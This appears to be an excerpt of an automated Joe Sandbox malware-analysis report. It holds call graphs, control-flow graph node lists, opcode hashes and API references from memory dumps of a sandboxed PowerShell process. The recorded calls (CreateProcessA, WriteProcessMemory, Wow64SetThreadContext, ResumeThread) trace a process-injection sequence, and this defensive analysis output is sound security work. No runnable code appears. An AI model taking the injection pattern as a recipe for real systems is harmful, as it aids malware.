12676->12723 12727 219297b 12676->12727 12681 2191c3a 12680->12681 12683 2192988 ResumeThread 12681->12683 12684 219297b ResumeThread 12681->12684 12682 2190d50 12683->12682 12684->12682 12686 2191dd4 12685->12686 12735 2190610 12686->12735 12739 2190605 12686->12739 12691 2190ec3 12690->12691 12692 2190d50 12691->12692 12743 2192930 12691->12743 12748 2192923 12691->12748 12696 2191688 12695->12696 12761 2190288 12696->12761 12700 2191088 12699->12700 12702 2192988 ResumeThread 12700->12702 12703 219297b ResumeThread 12700->12703 12701 2190d50 12702->12701 12703->12701 12706 2190288 WriteProcessMemory 12704->12706 12705 2190d50 12706->12705 12708 21915d3 12707->12708 12710 2190288 WriteProcessMemory 12708->12710 12709 21916cb 12710->12709 12712 219107d 12711->12712 12713 2190d50 12712->12713 12714 2192988 ResumeThread 12712->12714 12715 219297b ResumeThread 12712->12715 12714->12713 12715->12713 12718 2192930 2 API calls 12716->12718 12719 2192923 2 API calls 12716->12719 12717 2190d50 12718->12717 12719->12717 12722 2190288 WriteProcessMemory 12720->12722 12721 2190fa9 12722->12721 12724 219299d 12723->12724 12731 29fe48 12724->12731 12728 2192988 12727->12728 12730 29fe48 ResumeThread 12728->12730 12729 21929ba 12729->12677 12730->12729 12732 29fe8c ResumeThread 12731->12732 12734 29fed8 12732->12734 12734->12677 12736 2190697 CreateProcessA 12735->12736 12738 21908f4 12736->12738 12738->12738 12740 2190697 CreateProcessA 12739->12740 12742 21908f4 12740->12742 12742->12742 12744 2192945 12743->12744 12753 2190040 12744->12753 12757 2190007 12744->12757 12745 2192965 12745->12692 12749 2192945 12748->12749 12751 2190040 Wow64SetThreadContext 12749->12751 12752 2190007 Wow64SetThreadContext 12749->12752 12750 2192965 12750->12692 12751->12750 12752->12750 12754 2190089 Wow64SetThreadContext 12753->12754 12756 2190101 12754->12756 12756->12745 12758 2190089 Wow64SetThreadContext 12757->12758 12760 2190101 12758->12760 12760->12745 12762 21902d4 WriteProcessMemory 12761->12762 12764 219036d 12762->12764

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 248 295ee8-295f1e 250 295f20 248->250 251 295f25-295f5c 248->251 250->251 254 295f5f-295f65 251->254 255 295f6e-295f6f 254->255 256 295f67 254->256 265 296135-29613d 255->265 267 295f74-295fa9 255->267 257 296009-29600d 256->257 258 296159-2961d8 256->258 259 29622b-296246 256->259 260 2960cd-2960e8 256->260 261 2960ed-296111 call 294f6c 256->261 262 296020-296026 call 29ee3f 256->262 263 296140-296141 256->263 264 296042-2960ba 256->264 256->265 266 295fb5-295ff8 256->266 256->267 268 296116-296130 256->268 269 296142-296154 257->269 270 296013-29601b 257->270 296 2961e1-2961ea call 29ef38 258->296 259->254 260->254 261->254 275 29602c-29603d 262->275 263->269 264->254 294 2960c0-2960c8 264->294 266->254 291 295ffe-296004 266->291 267->254 287 295fab-295fb3 267->287 268->254 269->254 270->254 275->254 287->254 291->254 294->254 297 2961f0-29621a 296->297 297->254 299 296220-296226 297->299 299->254
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SjP
                                                                  • API String ID: 0-1466192239
                                                                  • Opcode ID: 30bc959850d57274af66d5702fe39a2ea8a25046f13510c2e99a9b9162d11682
                                                                  • Instruction ID: f649175a31cc46e7fc6129c27c40a97e1418e2425edfdca3d088dbfff235c1a3
                                                                  • Opcode Fuzzy Hash: 30bc959850d57274af66d5702fe39a2ea8a25046f13510c2e99a9b9162d11682
                                                                  • Instruction Fuzzy Hash: 32A10874E14208CFDB15DFA9D488AAEBBF2FF8A300F20406AD50AA7356DBB45955CF40

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 302 295ef8-295f1e 303 295f20 302->303 304 295f25-295f5c 302->304 303->304 307 295f5f-295f65 304->307 308 295f6e-295f6f 307->308 309 295f67 307->309 318 296135-29613d 308->318 320 295f74-295fa9 308->320 310 296009-29600d 309->310 311 296159-2961ea call 29ef38 309->311 312 29622b-296246 309->312 313 2960cd-2960e8 309->313 314 2960ed-296111 call 294f6c 309->314 315 296020-296026 call 29ee3f 309->315 316 296140-296141 309->316 317 296042-2960ba 309->317 309->318 319 295fb5-295ff8 309->319 309->320 321 296116-296130 309->321 322 296142-296154 310->322 323 296013-29601b 310->323 350 2961f0-29621a 311->350 312->307 313->307 314->307 328 29602c-29603d 315->328 316->322 317->307 347 2960c0-2960c8 317->347 319->307 344 295ffe-296004 319->344 320->307 340 295fab-295fb3 320->340 321->307 322->307 323->307 328->307 340->307 344->307 347->307 350->307 352 296220-296226 350->352 352->307
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SjP
                                                                  • API String ID: 0-1466192239
                                                                  • Opcode ID: 9d2ae33d64f840fde33dc669b88a4c4c38b692f34c1adaeb89b4b47279801f83
                                                                  • Instruction ID: 7defde6ef9bf844473c4c0f2851f3d4f30baf2bae9d89696cc05d1926baddf8e
                                                                  • Opcode Fuzzy Hash: 9d2ae33d64f840fde33dc669b88a4c4c38b692f34c1adaeb89b4b47279801f83
                                                                  • Instruction Fuzzy Hash: 64A1F874E14208CFDB14DFA9D489AAEBBF2FF89300F20806AD50AA7356DBB45955CF40

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 355 29f2dd-29f35a 360 29f360-29f368 355->360 361 29efd4-29efda 355->361 360->361 362 29efdc 361->362 363 29efe3-29efe4 361->363 364 29efe9-29f074 call 298bf8 * 2 362->364 365 29f117-29f150 362->365 366 29f199-29f22b 362->366 367 29f23e-29f25a call 29eb68 362->367 368 29f087-29f104 call 298bf8 362->368 363->364 363->365 364->361 393 29f07a-29f082 364->393 380 29f158-29f16f call 29f617 365->380 366->361 395 29f231-29f239 366->395 367->361 378 29f260-29f266 367->378 368->361 391 29f10a-29f112 368->391 378->361 385 29f175-29f194 380->385 385->361 391->361 393->361 395->361
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E>I
                                                                  • API String ID: 0-3352654960
                                                                  • Opcode ID: 3cb3d9318301e9c00dca461938e33414746b5be57d4c1e814dfb471378b72404
                                                                  • Instruction ID: d1f7fb7dad86994f649a6186dff6c539800e266676de8c5898920ed3b1dd12e4
                                                                  • Opcode Fuzzy Hash: 3cb3d9318301e9c00dca461938e33414746b5be57d4c1e814dfb471378b72404
                                                                  • Instruction Fuzzy Hash: 5F81C974A202088FDF94DF68D899B9DBBF1BB49300F5184AAD40AEB351DBB49E45CF00

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 397 29f36d-29f3e9 call 298bf8 403 29f3ef-29f3f7 397->403 404 29efd4-29efda 397->404 403->404 406 29efdc 404->406 407 29efe3-29efe4 404->407 408 29efe9-29f074 call 298bf8 * 2 406->408 409 29f117-29f150 406->409 410 29f199-29f22b 406->410 411 29f23e-29f25a call 29eb68 406->411 412 29f087-29f104 call 298bf8 406->412 407->408 407->409 408->404 437 29f07a-29f082 408->437 424 29f158-29f16f call 29f617 409->424 410->404 439 29f231-29f239 410->439 411->404 422 29f260-29f266 411->422 412->404 435 29f10a-29f112 412->435 422->404 429 29f175-29f194 424->429 429->404 435->404 437->404 439->404
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E>I
                                                                  • API String ID: 0-3352654960
                                                                  • Opcode ID: bdf6ae46aeda0d7c8d405c847f56db9af0505740705d3f0c73cd7bdc0a09e368
                                                                  • Instruction ID: cfec145d21c9dea0e0dbed6985064d4e80b23ecd09780730bb4842846b1b8a36
                                                                  • Opcode Fuzzy Hash: bdf6ae46aeda0d7c8d405c847f56db9af0505740705d3f0c73cd7bdc0a09e368
                                                                  • Instruction Fuzzy Hash: 8781D774A202088FDF94DF68D499BADBBF1BF49300F5584AAD40AEB255DBB49E45CF00

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 441 29f502-29f57e call 298bf8 447 29efd4-29efda 441->447 448 29f584-29f58c 441->448 449 29efdc 447->449 450 29efe3-29efe4 447->450 448->447 451 29efe9-29f074 call 298bf8 * 2 449->451 452 29f117-29f150 449->452 453 29f199-29f22b 449->453 454 29f23e-29f25a call 29eb68 449->454 455 29f087-29f104 call 298bf8 449->455 450->451 450->452 451->447 480 29f07a-29f082 451->480 467 29f158-29f16f call 29f617 452->467 453->447 482 29f231-29f239 453->482 454->447 465 29f260-29f266 454->465 455->447 478 29f10a-29f112 455->478 465->447 472 29f175-29f194 467->472 472->447 478->447 480->447 482->447
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E>I
                                                                  • API String ID: 0-3352654960
                                                                  • Opcode ID: 4b7dab16ec295d465b2a8b6c795bda68fbe95de548d62fe96f7e3ab84ca97614
                                                                  • Instruction ID: 6e24105851b5e0a29d1513142acfbe06a39952c3b1b547ccdd9e7f0ba3256e68
                                                                  • Opcode Fuzzy Hash: 4b7dab16ec295d465b2a8b6c795bda68fbe95de548d62fe96f7e3ab84ca97614
                                                                  • Instruction Fuzzy Hash: 7481C774A202088FDF94DF68D499BADBBF1BF49304F5184AAD40AEB251DBB45E45CF00

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 484 29f47a-29f4ef call 29f617 489 29f4f5-29f4fd 484->489 490 29efd4-29efda 484->490 489->490 491 29efdc 490->491 492 29efe3-29efe4 490->492 493 29efe9-29f074 call 298bf8 * 2 491->493 494 29f117-29f16f call 29f617 491->494 495 29f199-29f22b 491->495 496 29f23e-29f25a call 29eb68 491->496 497 29f087-29f104 call 298bf8 491->497 492->493 492->494 493->490 522 29f07a-29f082 493->522 514 29f175-29f194 494->514 495->490 524 29f231-29f239 495->524 496->490 507 29f260-29f266 496->507 497->490 520 29f10a-29f112 497->520 507->490 514->490 520->490 522->490 524->490
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E>I
                                                                  • API String ID: 0-3352654960
                                                                  • Opcode ID: aa6e6608a002cc11fda683752709db77a35547d3f63e97296338b4b48ebe288a
                                                                  • Instruction ID: 7d9aa7978ee823b7a2204ed49c03a343ace49fbfc612833ab4fd144cf02b5efe
                                                                  • Opcode Fuzzy Hash: aa6e6608a002cc11fda683752709db77a35547d3f63e97296338b4b48ebe288a
                                                                  • Instruction Fuzzy Hash: 4381C774A202088FDF94DF68D499BADBBF1BF49304F5184AAD40AEB255DBB49E45CF00

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 527 29ef88-29efb8 529 29efba 527->529 530 29efbf-29efcc 527->530 529->530 531 29efce-29efd1 530->531 532 29efd4-29efda 531->532 533 29efdc 532->533 534 29efe3-29efe4 532->534 535 29efe9-29f074 call 298bf8 * 2 533->535 536 29f117-29f150 533->536 537 29f199-29f22b 533->537 538 29f23e-29f25a call 29eb68 533->538 539 29f087-29f104 call 298bf8 533->539 534->535 534->536 535->532 564 29f07a-29f082 535->564 551 29f158-29f16f call 29f617 536->551 537->532 565 29f231-29f239 537->565 538->532 549 29f260-29f266 538->549 539->532 562 29f10a-29f112 539->562 549->532 556 29f175-29f194 551->556 556->531 562->532 564->532 565->532
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E>I
                                                                  • API String ID: 0-3352654960
                                                                  • Opcode ID: 3f9ae1b40f5559c5fd69fb96e631bc3263fbcaebd781810fa3ab546b99c3ddc5
                                                                  • Instruction ID: 6747b545d887f2e64add0465fd4eba98760e790aa9fd49c5934d23ec03d4edbe
                                                                  • Opcode Fuzzy Hash: 3f9ae1b40f5559c5fd69fb96e631bc3263fbcaebd781810fa3ab546b99c3ddc5
                                                                  • Instruction Fuzzy Hash: 10710974A202088FDF94DF68D899BADBBF1BF49304F5184AAD409EB251DBB45E85CF01

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 567 29ef98-29efb8 568 29efba 567->568 569 29efbf-29efcc 567->569 568->569 570 29efce-29efd1 569->570 571 29efd4-29efda 570->571 572 29efdc 571->572 573 29efe3-29efe4 571->573 574 29efe9-29f074 call 298bf8 * 2 572->574 575 29f117-29f150 572->575 576 29f199-29f22b 572->576 577 29f23e-29f25a call 29eb68 572->577 578 29f087-29f104 call 298bf8 572->578 573->574 573->575 574->571 603 29f07a-29f082 574->603 590 29f158-29f16f call 29f617 575->590 576->571 604 29f231-29f239 576->604 577->571 588 29f260-29f266 577->588 578->571 601 29f10a-29f112 578->601 588->571 595 29f175-29f194 590->595 595->570 601->571 603->571 604->571
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E>I
                                                                  • API String ID: 0-3352654960
                                                                  • Opcode ID: 9c6fb3773b9357cf0a457c43a9aa1a65bc32cb17cbe8453a69575bcc21be0a34
                                                                  • Instruction ID: f2bd51180af005dc4450b63425565d6250e408c6b0534d405f127b48edc61b99
                                                                  • Opcode Fuzzy Hash: 9c6fb3773b9357cf0a457c43a9aa1a65bc32cb17cbe8453a69575bcc21be0a34
                                                                  • Instruction Fuzzy Hash: 5971E874A202088FDF94DF68D899BADBBF1BF49304F5184AAD40AEB251DBB45E45CF01
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E>I
                                                                  • API String ID: 0-3352654960
                                                                  • Opcode ID: fa7051dd6f788cf4c1e248399020234855645dd48a4b5c45b01f51050dadd0aa
                                                                  • Instruction ID: de0d7d5d7d603c24b2bd10a86d3e0cc758359979e6c1b6d49d5f805eef4a2488
                                                                  • Opcode Fuzzy Hash: fa7051dd6f788cf4c1e248399020234855645dd48a4b5c45b01f51050dadd0aa
                                                                  • Instruction Fuzzy Hash: 4B61C874A202088FDF94DF68D899B9DBBF1BF49304F5584AAD40AEB251DBB49E45CF00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: E>I
                                                                  • API String ID: 0-3352654960
                                                                  • Opcode ID: 473b7d2739ab2586947c866b81708396df9e84d42b9b5fb90fddad1ba825cc7b
                                                                  • Instruction ID: c4e7e9350811c3b78ba36d0d951df03d2a827af59969a1e74b4b687b5979c8de
                                                                  • Opcode Fuzzy Hash: 473b7d2739ab2586947c866b81708396df9e84d42b9b5fb90fddad1ba825cc7b
                                                                  • Instruction Fuzzy Hash: D361D974A202088FDF94DF68D895BADBBF1BF49304F5184AAD40AEB251DBB55E45CF00
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376220381.0000000000290000.00000040.00000800.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_290000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 49952266effbf3a4852f3c9be679677fb91f9e58744d3d40872e8e7a474a8cfa
                                                                  • Instruction ID: 6b20f1006b62d5493ac5210bfb73e669efb005991a6eb2a9706e1e34e5c11db1
                                                                  • Opcode Fuzzy Hash: 49952266effbf3a4852f3c9be679677fb91f9e58744d3d40872e8e7a474a8cfa
                                                                  • Instruction Fuzzy Hash: 7A222934A11249EFDB15DFA8D484A9DFBF2BF89310F24805AE414AB361C775ED86CB90

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 4829b0-4829c2 1 4829c8-4829cd 0->1 2 482af1-482b10 0->2 3 4829cf-4829d5 1->3 4 4829e5-4829f2 1->4 9 482b3a-482b41 2->9 10 482b12-482b2a 2->10 5 4829d9-4829e3 3->5 6 4829d7 3->6 4->2 7 4829f8-4829ff 4->7 5->4 6->4 11 482a01-482a07 7->11 12 482a17-482a26 7->12 15 482b5b-482b78 9->15 16 482b43-482b49 9->16 13 482bea-482bf0 10->13 14 482b30-482b33 10->14 17 482a09 11->17 18 482a0b-482a0d 11->18 12->2 19 482a2c-482a33 12->19 32 482c0d-482c64 13->32 33 482bf2-482c0a 13->33 14->9 15->13 31 482b7a-482b9c 15->31 21 482b4b 16->21 22 482b4d-482b59 16->22 17->12 18->12 23 482a4b-482a64 19->23 24 482a35-482a3b 19->24 21->15 22->15 23->2 34 482a6a-482a6f 23->34 25 482a3d 24->25 26 482a3f-482a41 24->26 25->23 26->23 41 482b9e-482ba4 31->41 42 482bb6-482bce 31->42 60 482c91-482c96 32->60 61 482c66-482c74 32->61 33->32 36 482a71-482a77 34->36 37 482a87-482aa0 34->37 39 482a79 36->39 40 482a7b-482a85 36->40 68 482aa3 call 293189 37->68 69 482aa3 call 292e38 37->69 70 482aa3 call 29329a 37->70 71 482aa3 call 292a9f 37->71 72 482aa3 call 292f61 37->72 73 482aa3 call 292c80 37->73 74 482aa3 call 292ae5 37->74 75 482aa3 call 292b65 37->75 76 482aa3 call 292c25 37->76 77 482aa3 call 292c35 37->77 78 482aa3 call 292c55 37->78 79 482aa3 call 292f16 37->79 39->37 40->37 43 482ba8-482bb4 41->43 44 482ba6 41->44 52 482bdc-482be7 42->52 53 482bd0-482bd2 42->53 43->42 44->42 50 482aa5-482aae 50->2 54 482ab0-482ab5 50->54 53->52 55 482acd-482ae4 54->55 56 482ab7-482abd 54->56 66 482ae9-482af0 55->66 58 482abf 56->58 59 482ac1-482acb 56->59 58->55 59->55 60->61 67 482c7c-482c8b 61->67 67->60 68->50 69->50 70->50 71->50 72->50 73->50 74->50 75->50 76->50 77->50 78->50 79->50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376548634.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_480000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $;,$$;,
                                                                  • API String ID: 0-3530334740
                                                                  • Opcode ID: 92dd572669684ad9ca248018acfac9877306a72da6930e90511c05881b420443
                                                                  • Instruction ID: fb3374e803b08b50825c654a8ac1990d05d0835f63e1199bc2924adb4fdca4cf
                                                                  • Opcode Fuzzy Hash: 92dd572669684ad9ca248018acfac9877306a72da6930e90511c05881b420443
                                                                  • Instruction Fuzzy Hash: 8191A274B002449FD724EF68C950A6FBBE2AF85310F18C89AE8199F392CBB5DD42C755

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 80 2190605-21906a9 82 21906ab-21906c2 80->82 83 21906f2-219071a 80->83 82->83 88 21906c4-21906c9 82->88 86 219071c-2190730 83->86 87 2190760-21907b6 83->87 86->87 95 2190732-2190737 86->95 97 21907b8-21907cc 87->97 98 21907fc-21908f2 CreateProcessA 87->98 89 21906cb-21906d5 88->89 90 21906ec-21906ef 88->90 92 21906d9-21906e8 89->92 93 21906d7 89->93 90->83 92->92 96 21906ea 92->96 93->92 99 2190739-2190743 95->99 100 219075a-219075d 95->100 96->90 97->98 105 21907ce-21907d3 97->105 116 21908fb-21909e4 98->116 117 21908f4-21908fa 98->117 102 2190745 99->102 103 2190747-2190756 99->103 100->87 102->103 103->103 106 2190758 103->106 107 21907d5-21907df 105->107 108 21907f6-21907f9 105->108 106->100 110 21907e1 107->110 111 21907e3-21907f2 107->111 108->98 110->111 111->111 112 21907f4 111->112 112->108 128 21909f4-21909f8 116->128 129 21909e6-21909ea 116->129 117->116 131 2190a08-2190a0c 128->131 132 21909fa-21909fe 128->132 129->128 130 21909ec 129->130 130->128 133 2190a1c-2190a20 131->133 134 2190a0e-2190a12 131->134 132->131 135 2190a00 132->135 137 2190a22-2190a4b 133->137 138 2190a56-2190a61 133->138 134->133 136 2190a14 134->136 135->131 136->133 137->138 142 2190a62 138->142 142->142
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 021908DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376675661.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2190000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 997db1928b74c827cb0aa5d8864303ca3650809002180123a6e85716d62a981a
                                                                  • Instruction ID: f6173399c33b5d4802858646241033f75b8d99cc065cfae58dde7e9c7787b046
                                                                  • Opcode Fuzzy Hash: 997db1928b74c827cb0aa5d8864303ca3650809002180123a6e85716d62a981a
                                                                  • Instruction Fuzzy Hash: D7C13571D402298FDF25CFA4C881BEEBBB1BF49314F0091A9E859B7250DB749A85CF81

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 143 2190610-21906a9 145 21906ab-21906c2 143->145 146 21906f2-219071a 143->146 145->146 151 21906c4-21906c9 145->151 149 219071c-2190730 146->149 150 2190760-21907b6 146->150 149->150 158 2190732-2190737 149->158 160 21907b8-21907cc 150->160 161 21907fc-21908f2 CreateProcessA 150->161 152 21906cb-21906d5 151->152 153 21906ec-21906ef 151->153 155 21906d9-21906e8 152->155 156 21906d7 152->156 153->146 155->155 159 21906ea 155->159 156->155 162 2190739-2190743 158->162 163 219075a-219075d 158->163 159->153 160->161 168 21907ce-21907d3 160->168 179 21908fb-21909e4 161->179 180 21908f4-21908fa 161->180 165 2190745 162->165 166 2190747-2190756 162->166 163->150 165->166 166->166 169 2190758 166->169 170 21907d5-21907df 168->170 171 21907f6-21907f9 168->171 169->163 173 21907e1 170->173 174 21907e3-21907f2 170->174 171->161 173->174 174->174 175 21907f4 174->175 175->171 191 21909f4-21909f8 179->191 192 21909e6-21909ea 179->192 180->179 194 2190a08-2190a0c 191->194 195 21909fa-21909fe 191->195 192->191 193 21909ec 192->193 193->191 196 2190a1c-2190a20 194->196 197 2190a0e-2190a12 194->197 195->194 198 2190a00 195->198 200 2190a22-2190a4b 196->200 201 2190a56-2190a61 196->201 197->196 199 2190a14 197->199 198->194 199->196 200->201 205 2190a62 201->205 205->205
                                                                  APIs
                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 021908DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376675661.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2190000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 105a4b1df8e0ede6c1556b4d5855f9c3458f93b7cbb4f0fb0842b76bafe5dff5
                                                                  • Instruction ID: 8fd524b9262d40a352dbdb719ce4415b2408d920ac0e26d412be8d2bfd548dad
                                                                  • Opcode Fuzzy Hash: 105a4b1df8e0ede6c1556b4d5855f9c3458f93b7cbb4f0fb0842b76bafe5dff5
                                                                  • Instruction Fuzzy Hash: 15C11371D402298FDF24DFA4C881BEEBBB1BF49314F0091A9E859B7250DB749A85CF85

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 206 2190007-21900a0 208 21900a2-21900b4 206->208 209 21900b7-21900ff Wow64SetThreadContext 206->209 208->209 211 2190108-2190154 209->211 212 2190101-2190107 209->212 212->211
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 021900EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376675661.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2190000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 45dd95fb28d2bb27ffd3a26cf949feae9c599ba0fad2fe15362bb72294db74df
                                                                  • Instruction ID: ab7309df6cb52131b40c55d7f9778608dd7860a28431c2b2d522e0160e67148f
                                                                  • Opcode Fuzzy Hash: 45dd95fb28d2bb27ffd3a26cf949feae9c599ba0fad2fe15362bb72294db74df
                                                                  • Instruction Fuzzy Hash: 7E41F274D052888FCB01DFA9C8946EEBFF0FF4A314F1484AAD444AB251D7399949CF51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 217 2190288-21902f3 219 219030a-219036b WriteProcessMemory 217->219 220 21902f5-2190307 217->220 222 219036d-2190373 219->222 223 2190374-21903c6 219->223 220->219 222->223
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0219035B
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376675661.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2190000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: d4ff0b142e1f83b7d61b7b91d3e0a460b0c74d4318af17523f0ee412ab9f52c8
                                                                  • Instruction ID: 4fc579ac6e7cdf446ed1199407426953f300b11145fb797fabbcf09f40858255
                                                                  • Opcode Fuzzy Hash: d4ff0b142e1f83b7d61b7b91d3e0a460b0c74d4318af17523f0ee412ab9f52c8
                                                                  • Instruction Fuzzy Hash: 67419AB5D012589FCF00CFA9D984AEEFBF1BF49314F24942AE818B7250D734AA45CB54

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 228 2190040-21900a0 230 21900a2-21900b4 228->230 231 21900b7-21900ff Wow64SetThreadContext 228->231 230->231 233 2190108-2190154 231->233 234 2190101-2190107 231->234 234->233
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 021900EF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.376675661.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_2190000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: b5c3c7dba3cef942e9cca27da067401f31053f955c0feef75234184751853668
                                                                  • Instruction ID: a6a80e2addb250e9e5fde7de62ed24eaf470df4a72b77428eaf0db5bfc791cf1
                                                                  • Opcode Fuzzy Hash: b5c3c7dba3cef942e9cca27da067401f31053f955c0feef75234184751853668
                                                                  • Instruction Fuzzy Hash: F831BEB5D002589FDF10DFA9D984AEEBBF1BF49314F14802AE414B7240D738AA45CF54

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
